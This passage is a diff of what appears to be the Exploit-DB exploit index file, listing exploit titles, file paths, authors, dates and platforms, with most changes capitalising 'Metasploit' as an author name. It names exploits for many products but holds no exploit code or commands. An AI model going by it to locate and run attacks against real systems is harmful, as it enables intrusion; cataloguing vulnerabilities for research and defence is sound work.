(l param) Local File Inclusion",2011-06-10,LiquidWorm,php,webapps,0 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0 -17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 +17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,Metasploit,windows,remote,0 17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service",2011-06-27,"Myo Soe",windows,dos,0 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"Linux Kernel <= 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 -17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0 +17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,Metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion (0Day)",2011-06-13,jdc,php,webapps,0 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 @@ -15131,7 +15131,7 @@ id,file,description,date,author,platform,type,port 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0 -17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0 +17409,platforms/windows/remote/17409.rb,"Microsoft Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,Metasploit,windows,remote,0 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla - Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection",2011-06-19,CoBRa_21,php,webapps,0 @@ -15139,18 +15139,18 @@ id,file,description,date,author,platform,type,port 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder (id) Blind SQL Injection",2011-06-19,"Chip d3 bi0s",php,webapps,0 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 -17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 +17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2)",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 - URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 -17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,metasploit,windows,remote,0 +17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,Metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 -17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe - Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 -17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,metasploit,windows,remote,0 -17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 +17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe - Opcode 9 Buffer Overflow",2011-06-21,Metasploit,windows,remote,0 +17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,Metasploit,windows,remote,0 +17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,Metasploit,windows,remote,0 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection",2011-06-23,"Brendan Coles",php,webapps,0 17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal",2011-06-23,"Keith Lee",jsp,webapps,0 @@ -15163,9 +15163,9 @@ id,file,description,date,author,platform,type,port 17445,platforms/php/webapps/17445.txt,"2Point Solutions - (cmspages.php) SQL Injection",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion",2011-06-23,bd0rk,php,webapps,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - (.pls) Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 -17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,metasploit,windows,remote,0 -17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,metasploit,windows,remote,0 -17451,platforms/windows/local/17451.rb,"Microsoft Office Visio VISIODWG.DLL DXF File Handling",2011-06-26,metasploit,windows,local,0 +17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,Metasploit,windows,remote,0 +17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,Metasploit,windows,remote,0 +17451,platforms/windows/local/17451.rb,"Microsoft Office Visio VISIODWG.DLL DXF File Handling",2011-06-26,Metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi Persistent XSS",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"WordPress Beer Recipes Plugin 1.0 - XSS",2011-06-26,TheUzuki.',php,webapps,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection",2011-06-28,hamt0ry,php,webapps,0 @@ -15178,7 +15178,7 @@ id,file,description,date,author,platform,type,port 17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component SQL Injection",2011-07-01,"Caddy Dz",php,webapps,0 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection Vulnerabilities",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script - Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 -17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe - Opcode 27 Buffer Overflow",2011-07-01,metasploit,windows,remote,5555 +17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe - Opcode 27 Buffer Overflow",2011-07-01,Metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass",2011-07-02,"muts and dookie",windows,remote,5555 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service",2011-07-03,X-h4ck,windows,dos,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 @@ -15196,12 +15196,12 @@ id,file,description,date,author,platform,type,port 17484,platforms/php/webapps/17484.txt,"DmxReady Links Manager 1.2 - SQL Injection",2011-07-04,Bellatrix,php,webapps,0 17485,platforms/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,php,webapps,0 17486,platforms/multiple/local/17486.php,"PHP 5.3.6 - Buffer Overflow PoC (ROP)",2011-07-04,"Jonathan Salwan",multiple,local,0 -17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 +17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 - (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 - XFDF Buffer Overflow (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow Exploit (Metasploit)",2011-07-04,"James Fitts",windows,local,0 -17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,metasploit,windows,remote,0 +17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,Metasploit,windows,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow (Metasploit)",2011-07-05,"James Fitts",windows,local,0 -17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 +17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,Metasploit,unix,remote,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection",2011-07-05,Bellatrix,asp,webapps,0 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - (.zip) Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17495,platforms/php/webapps/17495.txt,"BbZL.PhP File Inclusion Exploit",2011-07-06,"Number 7",php,webapps,0 @@ -15211,22 +15211,22 @@ id,file,description,date,author,platform,type,port 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0 17500,platforms/php/webapps/17500.txt,"LuxCal Web Calendar 2.4.2 & 2.5.0 - SQL Injection",2011-07-07,kaMtiEz,php,webapps,0 17501,platforms/hardware/dos/17501.py,"Dlink DSL-2650U DoS/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0 -17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow",2011-07-07,metasploit,windows,local,0 +17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow",2011-07-07,Metasploit,windows,local,0 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 -39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,metasploit,windows,remote,80 -39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,metasploit,windows,remote,21 +39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 SEH Overflow",2016-04-05,Metasploit,windows,remote,80 +39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command",2016-04-05,Metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 -17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,metasploit,windows,remote,0 +17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,Metasploit,windows,remote,0 17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x - Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion",2011-07-09,Or4nG.M4N,php,webapps,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 -17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 (pid) Arbitrary File Deletion",2011-07-10,LiquidWorm,php,webapps,0 +17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 - (pid) Arbitrary File Deletion",2011-07-10,LiquidWorm,php,webapps,0 17519,platforms/windows/remote/17519.py,"Freefloat FTP Server (LIST command) Buffer Overflow Exploit",2011-07-10,"Zer0 Thunder",windows,remote,0 -17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer",2011-07-10,metasploit,windows,remote,0 +17520,platforms/windows/remote/17520.rb,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer",2011-07-10,Metasploit,windows,remote,0 17522,platforms/php/webapps/17522.txt,"Fire Soft Board <= 2.0.1 Persistent XSS (Admin Panel)",2011-07-12,"_jill for A-S",php,webapps,0 17523,platforms/php/webapps/17523.txt,"Tradingeye E-commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0 @@ -15235,15 +15235,15 @@ id,file,description,date,author,platform,type,port 17528,platforms/php/webapps/17528.txt,"LiteRadius <= 3.2 - Multiple Blind SQL Injection Vulnerabilities",2011-07-13,"Robert Cooper",php,webapps,0 17529,platforms/php/webapps/17529.txt,"TCExam <= 11.2.011 - Multiple SQL Injection Vulnerabilities",2011-07-13,LiquidWorm,php,webapps,0 17530,platforms/php/webapps/17530.txt,"SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections",2011-07-14,jdc,php,webapps,0 -17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 +17531,platforms/php/webapps/17531.txt,"PG eLms Pro vDEC_2007_01 - (contact_us.php) Multiple POST XSS Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17532,platforms/php/webapps/17532.txt,"PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection Vulnerabilities",2011-07-14,LiquidWorm,php,webapps,0 17533,platforms/php/webapps/17533.txt,"Inscribe Webmedia - SQL Injection",2011-07-14,Netrondoank,php,webapps,0 -17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,metasploit,multiple,remote,0 -40085,platforms/windows/local/40085.rb,"MS16-016 mrxdav.sys WebDav Local Privilege Escalation",2016-07-11,metasploit,windows,local,0 -17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,metasploit,windows,remote,0 +17535,platforms/multiple/remote/17535.rb,"Java RMI Server Insecure Default Configuration Java Code Execution",2011-07-15,Metasploit,multiple,remote,0 +40085,platforms/windows/local/40085.rb,"Windows 7 SP1 - mrxdav.sys WebDav Local Privilege Escalation (MS16-016)",2016-07-11,Metasploit,windows,local,0 +17537,platforms/windows/remote/17537.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow",2011-07-16,Metasploit,windows,remote,0 17539,platforms/windows/remote/17539.rb,"FreeFloat FTP Server 1.00 - MKD Buffer Overflow Exploit",2011-07-17,"C4SS!0 G0M3S",windows,remote,0 17540,platforms/windows/remote/17540.rb,"Freefloat FTP Server MKD Buffer Overflow (Metasploit)",2011-07-18,"James Fitts",windows,remote,0 -17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,metasploit,windows,remote,0 +17543,platforms/windows/remote/17543.rb,"Iconics GENESIS32 9.21.201.01 - Integer Overflow",2011-07-17,Metasploit,windows,remote,0 17544,platforms/windows/dos/17544.txt,"GDI+ - CreateDashedPath Integer Overflow in gdiplus.dll",2011-07-18,Abysssec,windows,dos,0 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 TR - Add Admin _kpss_ Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0 17546,platforms/windows/remote/17546.py,"FreeFloat FTP Server 1.0 - REST & PASV Buffer Overflow Exploit",2011-07-18,"C4SS!0 G0M3S",windows,remote,0 @@ -15259,7 +15259,7 @@ id,file,description,date,author,platform,type,port 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0 17560,platforms/php/webapps/17560.txt,"Joomla Component mod_spo SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 KisKrnl.sys <= 2011.7.8.913 - Local Kernel Mode Privilege Escalation Exploit",2011-07-22,MJ0011,windows,local,0 -17562,platforms/php/webapps/17562.php,"ExtCalendar2 (Auth Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 +17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Auth Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow Exploit (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17564,platforms/osx/shellcode/17564.asm,"OS-X - Universal ROP shellcode",2011-07-24,pa_kt,osx,shellcode,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 @@ -15278,16 +15278,16 @@ id,file,description,date,author,platform,type,port 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 -17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 +17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 - (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 17588,platforms/windows/remote/17588.rb,"Actfax FTP Server <= 4.27 - USER Command Stack Buffer Overflow (0Day) (Metasploit)",2011-07-31,mr_me,windows,remote,0 -17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 +17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - CSRF",2011-08-01,Xadpritox,php,webapps,0 17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection (0Day)",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 -17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 +17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,Metasploit,jsp,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0 @@ -15302,14 +15302,14 @@ id,file,description,date,author,platform,type,port 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass)",2011-08-05,Rh0,windows,remote,0 17613,platforms/php/webapps/17613.php,"WordPress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 -17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,metasploit,jsp,webapps,0 +17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,Metasploit,jsp,webapps,0 17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin <= 4.7.7 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin <= 5.6.5 - SQL Injection",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server DoS (Write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 - TFTP Server Directory Traversal",2011-08-05,"SecPod Research",windows,remote,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17637,platforms/php/webapps/17637.txt,"Simple Machines forum (SMF) 2.0 session hijacking",2011-08-07,seth,php,webapps,0 -17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,metasploit,windows,remote,0 +17626,platforms/windows/remote/17626.rb,"PXE Exploit server",2011-08-05,Metasploit,windows,remote,0 17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin <= 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0 17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 @@ -15331,17 +15331,17 @@ id,file,description,date,author,platform,type,port 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector - Remote Root Shell (Linux)",2011-08-10,SZ,linux,remote,0 17649,platforms/windows/remote/17649.py,"BisonFTP Server <= 3.5 - Remote Buffer Overflow Exploit",2011-08-10,localh0t,windows,remote,0 -17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (1)",2011-08-10,metasploit,windows,remote,0 +17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (1)",2011-08-10,Metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 -17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 +17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,Metasploit,windows,remote,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 -17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0 +17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 -17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 +17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 @@ -15364,15 +15364,15 @@ id,file,description,date,author,platform,type,port 17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin <= 1.2 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17688,platforms/php/webapps/17688.txt,"WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0 -17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,metasploit,multiple,remote,0 +17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,Metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV 